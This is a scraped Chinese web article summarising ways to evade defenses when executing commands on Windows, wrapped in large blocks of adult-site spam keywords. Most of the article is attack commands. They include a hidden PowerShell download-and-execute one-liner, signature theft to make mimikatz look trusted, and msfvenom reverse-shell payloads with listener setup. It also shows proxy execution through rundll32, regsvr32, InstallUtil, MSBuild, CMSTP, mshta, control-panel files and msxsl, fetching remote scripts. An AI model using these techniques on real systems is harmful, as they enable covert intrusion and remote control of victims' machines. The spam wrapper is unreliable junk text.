日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

Windows命令執行防御規避總結

瀏覽:291日期:2022-11-12 13:56:43

今天小編為大家帶來Windows命令執行防御規避總結,具體如下:

Windows命令執行防御規避總結

powershell

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))”“ /f

SIP

通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe

rundll32.exe

生成

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll

目標執行

rundll32.exe shell32.dll,Control_RunDLL xxx.dll

Regsvr32.exe

msfconsole

auxiliary/server/regsvr32_command_delivery_server

set CMD net user test 123456 /add

目標執行

regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll

InstallUtil.exe

1.編譯后門:

C:WindowsMicrosoft.NETFramework64v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:Program Files (x86)Microsoft SDKsWindowsv10.0AbinNETFX 4.8 Toolsx64key.snk“ xxx.cs

2.靶機上運行:

InstallUtil.exe /U xxx.exe

3.msf監聽,得到反彈的shell:

set payload windows/x64/meterpreter/reverse_tcp

set LHOST xx.xx.xx.xx

set LPORT 4444

exploit

Msbuild.exe

MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

https://github.com/3gstudent/msbuild-inline-task

msf生成shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444

-f csharp

使用shellcode替換https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分

msf監聽

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost xx.xx.xx.xx

set lport 4444

exploit

運行

C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe exec64.xml

CMSTP

cmstp.exe /s /ns C:UsersadministratorAppDataLocalTempXKNqbpzl.txt繞過AppLocker并啟動惡意腳本

Mshta.exe

Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

use exploit/windows/misc/hta_server

msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx

msf exploit(windows/misc/hta_server) 》 exploit

mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta

控制面板

攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。

攻擊者構造惡意的dll文件CPIApplet.dll

利用msf生成dll文件:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll

傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:usersadministratordesktopCPIApplet.cpl 執行命令

通過msxsl.exe調用惡意xml文件執行腳本

制作兩個文件

customers.xml

script.xsl

xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“

xmlns:msxsl=”urn:schemas-microsoft-com:xslt“

xmlns:user=”http://mycompany.com/mynamespace“》

function xml(nodelist) {

var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);

return nodelist.nextNode().xml;

}

開啟http服務

python3 -m http.server 80

遠程下載執行

msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl

標簽: Windows系統
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
中文字幕成人| 国产夫妻在线| 久久精品一区二区不卡| 久久爱www.| 国产欧美日韩在线观看视频| 亚洲精品在线a| 国产字幕视频一区二区| 久久九九精品| 午夜欧美精品| 国产女优一区| 久久亚洲电影| 亚洲欧美日本国产| 日韩中文欧美在线| 欧美91福利在线观看| 欧美日韩99| 日本aⅴ免费视频一区二区三区| 日韩精品三级| 国产精品亚洲欧美| 久久精品一本| 中文字幕在线免费观看视频| 日韩国产综合| a日韩av网址| 99久精品视频在线观看视频| 国产精品99免费看| 中文字幕亚洲在线观看| 天堂久久一区| 国产精品hd| 国产精品99视频| 久久国产中文字幕| 欧美综合二区| 欧美日韩网址| 麻豆理论在线观看| 亚洲精品小说| 欧美日韩调教| 日韩国产欧美一区二区| 视频一区二区不卡| 日本一区二区中文字幕| 国产精品观看| 色婷婷精品视频| 在线一区视频| 国产色噜噜噜91在线精品| 精品黄色一级片| 亚洲手机在线| 亚州欧美在线| 久久99性xxx老妇胖精品| av最新在线| 尤物在线精品| 国产日韩在线观看视频| 在线亚洲人成| 亚洲免费成人av在线| 激情综合婷婷| 欧美亚洲激情| 欧美亚洲免费| 另类中文字幕国产精品| 日韩在线网址| xxxxx性欧美特大| 亚洲另类视频| 日韩久久精品| 日韩国产在线观看一区| 97在线精品| 蜜桃久久精品一区二区| 精品久久亚洲| 视频一区免费在线观看| 国产66精品| 亚洲综合五月| 色婷婷精品视频| 午夜电影一区| 久久久久久久久99精品大| 97久久超碰| 亚洲精品97| 91一区二区三区四区| 日韩精品福利一区二区三区| 久久激情网站| 国产精品17p| 久久国产精品亚洲77777| 久久超级碰碰| 天堂av在线一区| 91视频精品| 97久久超碰| 另类激情亚洲| 成人精品中文字幕| 日韩国产一二三区| 亚洲国内欧美| 久久久久久自在自线| 亚洲精品自拍| 欧美99久久| 精品视频自拍| 日韩精品久久久久久久软件91| 国产一区观看| 欧美国产美女| 国产精品magnet| 喷白浆一区二区| 偷拍精品精品一区二区三区| 国产精品一区二区三区av麻| 丝袜亚洲另类欧美| 国产一区日韩一区| 久久影院一区二区三区| 综合色一区二区| 伊人久久大香线蕉av不卡| 国产美女精品视频免费播放软件| 国产精品试看| 久久蜜桃av| 97欧美在线视频| 国产精品伊人| 欧美偷窥清纯综合图区| 亚洲18在线| 亚洲精品一二| 蜜桃视频在线观看一区| 久久国产精品99国产| 伊人精品在线| 日韩一区三区| 日本三级亚洲精品| 一区二区高清| 蜜臀av亚洲一区中文字幕| 欧美成人国产| 亚洲福利久久| 久久九九电影| 久久夜夜操妹子| 天堂av在线| 日韩欧美另类一区二区| 国产精品久久久久久久久久久久久久久 | 中文一区一区三区免费在线观 | 精品国产亚洲一区二区三区大结局| 日欧美一区二区| 免费一级片91| 久久99伊人| 日韩在线观看一区二区| 欧美日韩高清| 欧美日韩在线网站| 99免费精品| 精品一区在线| 欧美~级网站不卡| 亚洲经典在线| 西西人体一区二区| 国产激情一区| 国产成人精品三级高清久久91| 日韩和欧美一区二区| 久久国产日韩欧美精品| 91成人福利| 麻豆精品在线视频| 久久精品日韩欧美| а√天堂8资源中文在线| 成年男女免费视频网站不卡| www.九色在线| 日韩国产在线| 激情综合网站| 亚洲精品无播放器在线播放| 日本v片在线高清不卡在线观看| 91成人在线| 久久久精品区| 日韩在线观看不卡| 日韩欧美另类一区二区| 不卡一区2区| 免费的成人av| 日韩不卡在线观看日韩不卡视频 | 欧美激情综合| 成人亚洲一区| 欧美亚洲国产一区| 日韩专区在线视频| 国产日产精品_国产精品毛片| 精品国产一区二区三区av片| 成人久久一区| 免费黄网站欧美| 日韩成人午夜精品| 精品国产午夜| 91精品蜜臀一区二区三区在线| 中文国产一区| 欧美亚洲一区二区三区| 亚洲国产成人二区| 午夜欧美在线| 亚洲精品在线二区| 美女久久精品| 久久久噜噜噜| 日本亚洲欧美天堂免费| 国产精品magnet| 亚洲成人二区| 日韩精品免费视频人成 | 综合国产精品| 国产视频一区三区| 久久精品三级| 国产日韩欧美三级| 午夜在线播放视频欧美| 久久国产免费| 久久久蜜桃一区二区人| 国产精品乱战久久久| 国产日韩高清一区二区三区在线 | 亚洲精品a级片| 日本天堂一区| 欧美日韩一区二区综合| 亚洲精一区二区三区| 国产在线观看91一区二区三区| 野花国产精品入口| 久久亚州av| 亚洲一区二区三区中文字幕在线观看| 国产精品一区二区三区av麻| 久久久久免费av| 欧美精品国产| 亚洲国内精品| 欧美精品不卡| 激情欧美国产欧美|